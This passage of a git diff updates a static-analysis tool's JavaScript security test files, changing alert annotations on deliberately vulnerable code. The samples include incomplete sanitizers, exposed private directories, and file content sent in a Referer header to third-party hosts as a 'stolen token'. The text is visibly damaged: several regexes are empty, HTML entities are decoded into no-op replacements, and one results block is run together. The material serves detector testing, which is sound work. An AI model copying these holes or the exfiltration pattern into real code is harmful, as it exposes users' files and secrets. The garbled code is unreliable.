+| tst.js:22:9:22:82 | source | tst.js:30:33:30:38 | source | provenance | | +| tst.js:22:18:22:41 | documen ... .search | tst.js:22:18:22:82 | documen ... , "$1") | provenance | | +| tst.js:22:18:22:82 | documen ... , "$1") | tst.js:22:9:22:82 | source | provenance | | nodes | NoSQLCodeInjection.js:18:24:18:31 | req.body | semmle.label | req.body | | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | semmle.label | req.body.query | @@ -64,24 +64,24 @@ nodes | angularjs.js:53:32:53:46 | location.search | semmle.label | location.search | | eslint-escope-build.js:20:22:20:22 | c | semmle.label | c | | eslint-escope-build.js:21:16:21:16 | c | semmle.label | c | -| express.js:7:24:7:69 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:7:44:7:62 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:9:34:9:79 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:9:54:9:72 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:12:8:12:53 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:12:28:12:46 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:15:22:15:54 | req.par ... ction") | semmle.label | req.par ... ction") | -| express.js:17:30:17:53 | req.par ... cript") | semmle.label | req.par ... cript") | -| express.js:19:37:19:70 | req.par ... odule") | semmle.label | req.par ... odule") | -| express.js:21:19:21:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | -| express.js:26:9:26:35 | taint | semmle.label | taint | -| express.js:26:17:26:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:27:34:27:38 | taint | semmle.label | taint | -| express.js:34:9:34:35 | taint | semmle.label | taint | -| express.js:34:17:34:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:43:15:43:19 | taint | semmle.label | taint | -| express.js:49:30:49:32 | msg | semmle.label | msg | -| express.js:50:10:50:12 | msg | semmle.label | msg | +| express.js:6:24:6:69 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:6:44:6:62 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:7:34:7:79 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:7:54:7:72 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:9:8:9:53 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:9:28:9:46 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:11:22:11:54 | req.par ... ction") | semmle.label | req.par ... ction") | +| express.js:12:30:12:53 | req.par ... cript") | semmle.label | req.par ... cript") | +| express.js:13:37:13:70 | req.par ... odule") | semmle.label | req.par ... odule") | +| express.js:14:19:14:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | +| express.js:19:9:19:35 | taint | semmle.label | taint | +| express.js:19:17:19:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:20:34:20:38 | taint | semmle.label | taint | +| express.js:27:9:27:35 | taint | semmle.label | taint | +| express.js:27:17:27:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:36:15:36:19 | taint | semmle.label | taint | +| express.js:42:30:42:32 | msg | semmle.label | msg | +| express.js:43:10:43:12 | msg | semmle.label | msg | | module.js:9:16:9:29 | req.query.code | semmle.label | req.query.code | | module.js:11:17:11:30 | req.query.code | semmle.label | req.query.code | | react-native.js:7:7:7:33 | tainted | semmle.label | tainted | @@ -105,25 +105,25 @@ nodes | template-sinks.js:31:19:31:25 | tainted | semmle.label | tainted | | template-sinks.js:32:16:32:22 | tainted | semmle.label | tainted | | template-sinks.js:33:17:33:23 | tainted | semmle.label | tainted | -| tst.js:2:6:2:27 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:2:6:2:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:5:12:5:33 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:14:10:14:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:14:10:14:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:17:21:17:42 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:20:30:20:51 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:6:23:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | -| tst.js:23:11:23:32 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:11:23:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | -| tst.js:26:26:26:40 | location.search | semmle.label | location.search | -| tst.js:26:26:26:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | -| tst.js:29:9:29:82 | source | semmle.label | source | -| tst.js:29:18:29:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:29:18:29:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:31:18:31:23 | source | semmle.label | source | -| tst.js:33:14:33:19 | source | semmle.label | source | -| tst.js:35:28:35:33 | source | semmle.label | source | -| tst.js:37:33:37:38 | source | semmle.label | source | +| tst.js:1:6:1:27 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:1:6:1:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:3:12:3:33 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:11:10:11:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:11:10:11:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:13:21:13:42 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:15:30:15:51 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:6:17:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | +| tst.js:17:11:17:32 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:11:17:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | +| tst.js:19:26:19:40 | location.search | semmle.label | location.search | +| tst.js:19:26:19:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | +| tst.js:22:9:22:82 | source | semmle.label | source | +| tst.js:22:18:22:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:22:18:22:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:24:18:24:23 | source | semmle.label | source | +| tst.js:26:14:26:19 | source | semmle.label | source | +| tst.js:28:28:28:33 | source | semmle.label | source | +| tst.js:30:33:30:38 | source | semmle.label | source | | webix/webix.html:3:16:3:37 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:4:26:4:47 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:5:47:5:68 | documen ... on.hash | semmle.label | documen ... on.hash | diff --git a/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected b/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected index b8b29a028c25..db091b03406c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected +++ b/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected @@ -1,8 +1,8 @@ -| tst-httpOnly.js:11:9:15:2 | session ... BAD\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:11:9:15:2 | session ... lert\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:29:9:29:21 | session(sess) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:38:9:38:22 | session(sess2) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:47:9:47:22 | session(sess3) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:51:9:55:2 | session ... BAD\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:51:9:55:2 | session ... lert\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:68:5:73:10 | res.coo ... }) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:78:5:81:10 | res.coo ... }) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:101:5:101:43 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | @@ -12,9 +12,9 @@ | tst-httpOnly.js:148:5:148:41 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:159:5:159:43 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:170:5:170:40 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:209:37:209:51 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:229:38:229:52 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:289:37:289:59 | `authKe ... {attr}` | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:303:9:307:2 | session ... BAD\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:320:9:324:2 | session ... tter\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:330:37:330:68 | "sessio ... onKey() | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:208:37:208:51 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:227:38:227:52 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:287:37:287:59 | `authKe ... {attr}` | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:301:9:305:2 | session ... lert\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:318:9:322:2 | session ... tter\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:328:37:328:68 | "sessio ... onKey() | Sensitive server cookie is missing 'httpOnly' flag. | diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected index 96a48fec6cb8..22b3868a62a8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteMultiCharacterSanitization.expected @@ -18,25 +18,25 @@ | tst-multi-character-sanitization.js:83:7:83:63 | x.repla ... gi, "") | This string may still contain $@, which may cause an HTML element injection vulnerability. | tst-multi-character-sanitization.js:83:18:83:21 | | Missing result: Alert | +| polyfill-nocheck.html:4:9:4:98 | Content loaded from untrusted domain with no integrity check. | Unexpected result: Alert | diff --git a/javascript/ql/test/query-tests/Security/CWE-830/FunctionalityFromUntrustedSource.expected b/javascript/ql/test/query-tests/Security/CWE-830/FunctionalityFromUntrustedSource.expected index c97e109441dd..acafaf1a7be7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-830/FunctionalityFromUntrustedSource.expected +++ b/javascript/ql/test/query-tests/Security/CWE-830/FunctionalityFromUntrustedSource.expected @@ -1,3 +1,4 @@ +#select | DynamicCreationOfUntrustedSourceUse.html:18:28:18:129 | ('https ... /ga.js' | Script loaded using unencrypted connection. | | DynamicCreationOfUntrustedSourceUse.html:21:26:21:50 | 'http:/ ... e.com/' | Iframe loaded using unencrypted connection. | | DynamicCreationOfUntrustedSourceUse.html:31:27:31:40 | getUrl('v123') | Iframe loaded using unencrypted connection. | @@ -5,3 +6,12 @@ | StaticCreationOfUntrustedSourceUse.html:6:9:6:56 | + {/* $ Alert[js/code-injection] */}
); diff --git a/javascript/ql/test/query-tests/Security/CWE-116/DoubleEscaping/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/DoubleEscaping/tst.js index 72ea3df20038..5c31272ac5a2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/DoubleEscaping/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/DoubleEscaping/tst.js @@ -1,7 +1,7 @@ function badEncode(s) { return s.replace(/"/g, """) .replace(/'/g, "'") - .replace(/&/g, "&"); + .replace(/&/g, "&"); // $ Alert } function goodEncode(s) { @@ -17,7 +17,7 @@ function goodDecode(s) { } function badDecode(s) { - return s.replace(/&/g, "&") + return s.replace(/&/g, "&") // $ Alert .replace(/"/g, "\"") .replace(/'/g, "'"); } @@ -27,7 +27,7 @@ function cleverEncode(code) { } function badDecode2(s) { - return s.replace(/&/g, "&") + return s.replace(/&/g, "&") // $ Alert .replace(/s?ome|thin*g/g, "else") .replace(/'/g, "'"); } @@ -44,20 +44,20 @@ function goodDecodeInLoop(ss) { } function badDecode3(s) { - s = s.replace(/&/g, "&"); + s = s.replace(/&/g, "&"); // $ Alert s = s.replace(/"/g, "\""); return s.replace(/'/g, "'"); } function badUnescape(s) { - return s.replace(/\\\\/g, '\\') + return s.replace(/\\\\/g, '\\') // $ Alert .replace(/\\'/g, '\'') .replace(/\\"/g, '\"'); } function badPercentEscape(s) { s = s.replace(/&/g, '%26'); - s = s.replace(/%/g, '%25'); + s = s.replace(/%/g, '%25'); // $ Alert return s; } @@ -67,7 +67,7 @@ function badEncode(s) { var indirect3 = /&/g; return s.replace(indirect1, """) .replace(indirect2, "'") - .replace(indirect3, "&"); + .replace(indirect3, "&"); // $ Alert } function badEncodeWithReplacer(s) { @@ -76,7 +76,7 @@ function badEncodeWithReplacer(s) { "'": "'", "&": "&" }; - return s.replace(/["']/g, (c) => repl[c]).replace(/&/g, "&"); + return s.replace(/["']/g, (c) => repl[c]).replace(/&/g, "&"); // $ Alert } // dubious, but out of scope for this query diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js index 6f34830bf770..e18b45880bd3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js @@ -2,71 +2,71 @@ let express = require('express'); var app = express(); function bad1(s) { - return s.replace("'", ""); // $ Alert + return s.replace("'", ""); // $ Alert[js/incomplete-sanitization] } function bad2(s) { - return s.replace(/'/, ""); // $ Alert + return s.replace(/'/, ""); // $ Alert[js/incomplete-sanitization] } function bad3(s) { - return s.replace(/'/g, "\\'"); // $ Alert + return s.replace(/'/g, "\\'"); // $ Alert[js/incomplete-sanitization] } function bad4(s) { - return s.replace(/'/g, "\\$&"); // $ Alert + return s.replace(/'/g, "\\$&"); // $ Alert[js/incomplete-sanitization] } function bad5(s) { - return s.replace(/['"]/g, "\\$&"); // $ Alert + return s.replace(/['"]/g, "\\$&"); // $ Alert[js/incomplete-sanitization] } function bad6(s) { - return s.replace(/(['"])/g, "\\$1"); // $ Alert + return s.replace(/(['"])/g, "\\$1"); // $ Alert[js/incomplete-sanitization] } function bad7(s) { - return s.replace(/('|")/g, "\\$1"); // $ Alert + return s.replace(/('|")/g, "\\$1"); // $ Alert[js/incomplete-sanitization] } function bad8(s) { - return s.replace('|', ''); // $ Alert + return s.replace('|', ''); // $ Alert[js/incomplete-sanitization] } function bad9(s) { - return s.replace(/"/g, "\\\""); // $ Alert + return s.replace(/"/g, "\\\""); // $ Alert[js/incomplete-sanitization] } function bad10(s) { - return s.replace("/", "%2F"); // $ Alert + return s.replace("/", "%2F"); // $ Alert[js/incomplete-sanitization] } function bad11(s) { - return s.replace("%25", "%"); // $ Alert + return s.replace("%25", "%"); // $ Alert[js/incomplete-sanitization] } function bad12(s) { - return s.replace(`'`, ""); // $ Alert + return s.replace(`'`, ""); // $ Alert[js/incomplete-sanitization] } function bad13(s) { - return s.replace("'", ``); // $ Alert + return s.replace("'", ``); // $ Alert[js/incomplete-sanitization] } function bad14(s) { - return s.replace(`'`, ``); // $ Alert + return s.replace(`'`, ``); // $ Alert[js/incomplete-sanitization] } function bad15(s) { - return s.replace("'" + "", ""); // $ Alert + return s.replace("'" + "", ""); // $ Alert[js/incomplete-sanitization] } function bad16(s) { - return s.replace("'", "" + ""); // $ Alert + return s.replace("'", "" + ""); // $ Alert[js/incomplete-sanitization] } function bad17(s) { - return s.replace("'" + "", "" + ""); // $ Alert + return s.replace("'" + "", "" + ""); // $ Alert[js/incomplete-sanitization] } function good1(s) { @@ -130,23 +130,23 @@ function good12(s) { s.replace('[', '').replace(']', ''); s.replace('(', '').replace(')', ''); s.replace('{', '').replace('}', ''); - s.replace('<', '').replace('>', ''); // $ Alert - too common as a bad HTML sanitizer + s.replace('<', '').replace('>', ''); // too common as a bad HTML sanitizer - s.replace('[', '\\[').replace(']', '\\]'); // $ Alert - s.replace('{', '\\{').replace('}', '\\}'); // $ Alert + s.replace('[', '\\[').replace(']', '\\]'); + s.replace('{', '\\{').replace('}', '\\}'); s = s.replace('[', ''); s = s.replace(']', ''); - s.replace(/{/, '').replace(/}/, ''); // $ Alert - should have used a string literal if a single replacement was intended - s.replace(']', '').replace('[', ''); // probably OK, but still flagged + s.replace(/{/, '').replace(/}/, ''); // should have used a string literal if a single replacement was intended + s.replace(']', '').replace('[', ''); // $ Alert[js/incomplete-sanitization] - probably OK, but still flagged } function newlines(s) { // motivation for whitelist require("child_process").execSync("which emacs").toString().replace("\n", ""); - x.replace("\n", "").replace(x, y); // $ Alert - x.replace(x, y).replace("\n", ""); // $ Alert + x.replace("\n", "").replace(x, y); + x.replace(x, y).replace("\n", ""); } app.get('/some/path', function(req, res) { @@ -190,7 +190,7 @@ app.get('/some/path', function(req, res) { (function (s) { var indirect = /'/; - return s.replace(indirect, ""); // $ Alert + return s.replace(indirect, ""); // $ Alert[js/incomplete-sanitization] }); (function (s) { @@ -199,20 +199,20 @@ app.get('/some/path', function(req, res) { }); function bad18(p) { - return p.replace("/../", ""); // $ Alert + return p.replace("/../", ""); // $ Alert[js/incomplete-sanitization] } function typicalBadHtmlSanitizers(s) { - s().replace(/[<>]/g,''); // $ Alert - s().replace(/[<>&]/g, ''); // $ Alert - s().replace(/[<>"]/g, ''); // $ Alert - s().replace(//g, ''); // $ Alert - s().replace(//g, '').replace(/&/g, ''); // $ Alert - s().replace(//g, ''); // $ Alert - s().replace(/&/g, '').replace(/>/g, '').replace(/]/g,''); + s().replace(/[<>&]/g, ''); + s().replace(/[<>"]/g, ''); + s().replace(//g, ''); + s().replace(//g, '').replace(/&/g, ''); + s().replace(//g, ''); + s().replace(/&/g, '').replace(/>/g, '').replace(//g, ''); // $ Alert + s = s.replace(/>/g, ''); s().replace(//g, '>').replace(/&/g, '&').replace(/"/g, '"'); s().replace(//g, '>').replace(/&/g, '&').replace(/'/g, '''); // OK - single quotes or double quotes both work @@ -306,7 +306,7 @@ function incompleteHtmlAttributeSanitization2() { } function incompleteComplexSanitizers() { - '=\'' + s().replace(/[&<>"]/gm, function (str) { // $ Alert + '=\'' + s().replace(/[&<>"]/gm, function (str) { if (str === "&") return "&"; if (str === "<") @@ -315,7 +315,7 @@ function incompleteComplexSanitizers() { return ">"; if (str === "\"") return """; - }) + '\''; + }) + '\''; // $ Alert[js/incomplete-html-attribute-sanitization] '="' + s().replace(/[&<>"]/gm, function (str) { if (str === "&") @@ -330,27 +330,27 @@ function incompleteComplexSanitizers() { } function typicalBadHtmlSanitizers(s) { - s().replace(new RegExp("[<>]", "g"),''); // $ Alert + s().replace(new RegExp("[<>]", "g"),''); } function typicalBadHtmlSanitizers(s) { - s().replace(new RegExp("[<>]", unknown()),''); // $ Alert + s().replace(new RegExp("[<>]", unknown()),''); } function bad18NewRegExp(p) { - return p.replace(new RegExp("\\.\\./"), ""); // $ Alert + return p.replace(new RegExp("\\.\\./"), ""); } function bad4NewRegExpG(s) { - return s.replace(new RegExp("\'","g"), "\\$&"); // $ Alert + return s.replace(new RegExp("\'","g"), "\\$&"); // $ Alert[js/incomplete-sanitization] } function bad4NewRegExp(s) { - return s.replace(new RegExp("\'"), "\\$&"); // $ Alert + return s.replace(new RegExp("\'"), "\\$&"); // $ Alert[js/incomplete-sanitization] } function bad4NewRegExpUnknown(s) { - return s.replace(new RegExp("\'", unknownFlags()), "\\$&"); // $ Alert + return s.replace(new RegExp("\'", unknownFlags()), "\\$&"); // $ Alert[js/incomplete-sanitization] } function newlinesNewReGexp(s) { @@ -359,8 +359,8 @@ function newlinesNewReGexp(s) { x.replace(new RegExp("\n", "g"), "").replace(x, y); x.replace(x, y).replace(new RegExp("\n", "g"), ""); - x.replace(new RegExp("\n"), "").replace(x, y); // $ Alert - x.replace(x, y).replace(new RegExp("\n"), ""); // $ Alert + x.replace(new RegExp("\n"), "").replace(x, y); // $ Alert[js/incomplete-sanitization] + x.replace(x, y).replace(new RegExp("\n"), ""); // $ Alert[js/incomplete-sanitization] x.replace(new RegExp("\n", unknownFlags()), "").replace(x, y); x.replace(x, y).replace(new RegExp("\n", unknownFlags()), ""); diff --git a/javascript/ql/test/query-tests/Security/CWE-178/tst.js b/javascript/ql/test/query-tests/Security/CWE-178/tst.js index 4d320438eb54..9394d6303fa0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-178/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-178/tst.js @@ -88,7 +88,7 @@ app.get('/baz3/a', (req, resp) => { resp.send({ test: 123 }); }); -app.use(/\/summonerByName|\/currentGame/,apiLimit1, apiLimit2); +app.use(/\/summonerByName|\/currentGame/,apiLimit1, apiLimit2); // $ Alert app.get('/currentGame', function (req, res) { res.send("FOO"); diff --git a/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js b/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js index 4509c3c6cc76..d197c141cb14 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js @@ -7,4 +7,4 @@ https.get({ path: "/upload", method: "GET", headers: { Referer: content } -}, () => { }); +}, () => { }); // $ Alert[js/file-access-to-http] diff --git a/javascript/ql/test/query-tests/Security/CWE-200/lib/tst.js b/javascript/ql/test/query-tests/Security/CWE-200/lib/tst.js index b534af05b92f..23c29cde28ad 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/lib/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/lib/tst.js @@ -4,8 +4,8 @@ var path = require("path"); var app = express(); -app.use('basedir', express.static(__dirname)); // $ Alert +app.use('basedir', express.static(__dirname)); // $ Alert[js/exposure-of-private-files] const rootDir = __dirname; -app.use('basedir', express.static(rootDir)); // $ Alert +app.use('basedir', express.static(rootDir)); // $ Alert[js/exposure-of-private-files] -app.use('/monthly', express.static(__dirname + '/')); // $ Alert \ No newline at end of file +app.use('/monthly', express.static(__dirname + '/')); // $ Alert[js/exposure-of-private-files] \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js b/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js index d1199c259e3e..c3aaec3926ff 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js @@ -5,21 +5,21 @@ var path = require("path"); var app = express(); // Not good. -app.use(express.static('./node_modules/angular')); -app.use('/angular', express.static('node_modules/angular')); -app.use('/animate', express.static('node_modules/angular-animate')); -app.use('/js', express.static(__dirname + '/node_modules/angular')); -app.use('/router', express.static(__dirname + '/node_modules/angular-route/')); -app.use(express.static('/node_modules/angular')); -app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); -app.use('/js',express.static('./')); -app.use('/angular', express.static("./node_modules" + '/angular/')); -app.use('/angular', express.static(path.join("./node_modules" + '/angular/'))); -app.use('/angular', express.static(path.join(__dirname, "/node_modules"))); -app.use('/angular', express.static(path.join(__dirname, "/node_modules") + '/angular/')); +app.use(express.static('./node_modules/angular')); // $ Alert[js/exposure-of-private-files] +app.use('/angular', express.static('node_modules/angular')); // $ Alert[js/exposure-of-private-files] +app.use('/animate', express.static('node_modules/angular-animate')); // $ Alert[js/exposure-of-private-files] +app.use('/js', express.static(__dirname + '/node_modules/angular')); // $ Alert[js/exposure-of-private-files] +app.use('/router', express.static(__dirname + '/node_modules/angular-route/')); // $ Alert[js/exposure-of-private-files] +app.use(express.static('/node_modules/angular')); // $ Alert[js/exposure-of-private-files] +app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); // $ Alert[js/exposure-of-private-files] +app.use('/js',express.static('./')); // $ Alert[js/exposure-of-private-files] +app.use('/angular', express.static("./node_modules" + '/angular/')); // $ Alert[js/exposure-of-private-files] +app.use('/angular', express.static(path.join("./node_modules" + '/angular/'))); // $ Alert[js/exposure-of-private-files] +app.use('/angular', express.static(path.join(__dirname, "/node_modules"))); // $ Alert[js/exposure-of-private-files] +app.use('/angular', express.static(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert[js/exposure-of-private-files] const rootDir = __dirname; const nodeDir = path.join(rootDir + "/node_modules"); -app.use('/angular', express.static(nodeDir + '/angular/')); +app.use('/angular', express.static(nodeDir + '/angular/')); // $ Alert[js/exposure-of-private-files] @@ -37,10 +37,10 @@ app.use('basedir', express.static(__dirname)); // OK - because there is no packa app.use('/monthly', express.static(__dirname + '/')); // OK - because there is no package.json in the same folder. const connect = require("connect"); -app.use('/angular', connect.static(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert -app.use('/angular', require('serve-static')(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert -app.use('/home', require('serve-static')(require("os").homedir())); // $ Alert -app.use('/root', require('serve-static')("/")); // $ Alert +app.use('/angular', connect.static(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert[js/exposure-of-private-files] +app.use('/angular', require('serve-static')(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert[js/exposure-of-private-files] +app.use('/home', require('serve-static')(require("os").homedir())); // $ Alert[js/exposure-of-private-files] +app.use('/root', require('serve-static')("/")); // $ Alert[js/exposure-of-private-files] // Bad documentation example function bad() { @@ -48,7 +48,7 @@ function bad() { var app = express(); - app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); // $ Alert + app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); // $ Alert[js/exposure-of-private-files] } // Good documentation example @@ -67,7 +67,7 @@ const serveHandler = require("serve-handler"); const http = require("http"); http.createServer((request, response) => { - serveHandler(request, response, {public: "./node_modules/angular"}); // $ Alert + serveHandler(request, response, {public: "./node_modules/angular"}); // $ Alert[js/exposure-of-private-files] serveHandler(request, response); }).listen(8080); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js b/javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js index dc86544b5d36..5c4df5220b80 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js @@ -22,7 +22,7 @@ try { res.setEncoding('utf8'); }); - post_req.write(s); // $ Alert - post the data from file to request body + post_req.write(s); // $ Alert[js/file-access-to-http] - post the data from file to request body post_req.end(); } catch (e) { } diff --git a/javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js b/javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js index d20c27d0eae7..506eead886cf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js @@ -26,7 +26,7 @@ fs.exists(fileName, function (exists) { res.setEncoding('utf8'); }); - req.write(chunk); // $ Alert - write data from file to request body + req.write(chunk); // $ Alert[js/file-access-to-http] - write data from file to request body req.end(); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-200/request.js b/javascript/ql/test/query-tests/Security/CWE-200/request.js index 22097c49f5ed..13c98c8fd939 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/request.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/request.js @@ -19,8 +19,8 @@ function PostXML(xmlData) headers: { "content-type": "application/xml", }, - body: xmlData // $ Alert - passing data from file to the request body - }, function (error, response, body){ + body: xmlData // passing data from file to the request body + }, function (error, response, body){ // $ Alert[js/file-access-to-http] console.log(response); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js b/javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js index f663e9f286da..9bd2122a183b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js @@ -15,14 +15,14 @@ try { hostname: "sstatic1.histats.com", path: "/0.gif?4103075&101", method: "GET", - headers: { Referer: "http://1.a/" + content } // $ Alert - passing stolen token in a header - }, () => { }) + headers: { Referer: "http://1.a/" + content } // passing stolen token in a header + }, () => { }) // $ Alert[js/file-access-to-http] https1.get({ hostname: "c.statcounter.com", path: "/11760461/0/7b5b9d71/1/", method: "GET", - headers: { Referer: "http://2.b/" + content } // $ Alert - passing stolen token in a header - }, () => { }) + headers: { Referer: "http://2.b/" + content } // passing stolen token in a header + }, () => { }) // $ Alert[js/file-access-to-http] }); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-200/subfolder/private-file-exposure-2.js b/javascript/ql/test/query-tests/Security/CWE-200/subfolder/private-file-exposure-2.js index ec2e40a7c2b3..b6243e115f1c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/subfolder/private-file-exposure-2.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/subfolder/private-file-exposure-2.js @@ -3,4 +3,4 @@ var http = require('http') var app = express() var server = http.createServer(app) // Static files: -app.use(express.static(__dirname)) +app.use(express.static(__dirname)) // $ Alert[js/exposure-of-private-files] diff --git a/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar.js 